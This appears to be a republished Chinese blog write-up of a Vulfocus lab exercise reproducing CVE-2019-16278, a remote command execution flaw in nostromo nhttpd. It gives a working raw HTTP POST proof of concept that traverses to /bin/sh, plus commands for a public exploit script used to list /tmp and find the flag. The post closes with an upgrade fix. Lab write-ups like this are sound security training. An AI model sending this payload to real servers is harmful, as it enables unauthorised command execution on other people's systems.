其他分享
首页 > 其他分享> > 【Vulfocus靶场复现】nostromo 远程命令执行 (CVE-2019-16278)

【Vulfocus靶场复现】nostromo 远程命令执行 (CVE-2019-16278)

作者:互联网

漏洞介绍

Nostromo nhttpd是一款开源的Web服务器。 Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件,借此执行任意命令。

影响版本

nhttpd:version <= 1.9.6

解题过程

1、启动靶场环境

2、Burp Suite 抓包验证POC

POC

POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Length: 25
 
echo
echo
ifconfig 2>&1

3、脚本利用

脚本地址:https://github.com/jas502n/CVE-2019-16278

./CVE-2019-16278.sh IP地址 端口号 id

利用成功,这时也可以测试下其他命令,我在这里就不浪费时间了,直接上最终获得 flag 的命令,其他命令可自行了解。

之前做过Vulfocus靶场的朋友们都知道 flag 是在 /tmp 目录下,那我们就直接去 tmp 目录下找 flag 就行了。

./CVE-2019-16278.sh IP地址 端口号 "cd /tmp&&ls"

成功获得 flag

解决方案

升级至最新版本1.9.7

http://www.nazgul.ch/dev/nostromo-1.9.7.tar.gz

标签:Vulfocus,.%,flag,2019,0d,CVE,16278
来源: https://www.cnblogs.com/w328/p/15732636.html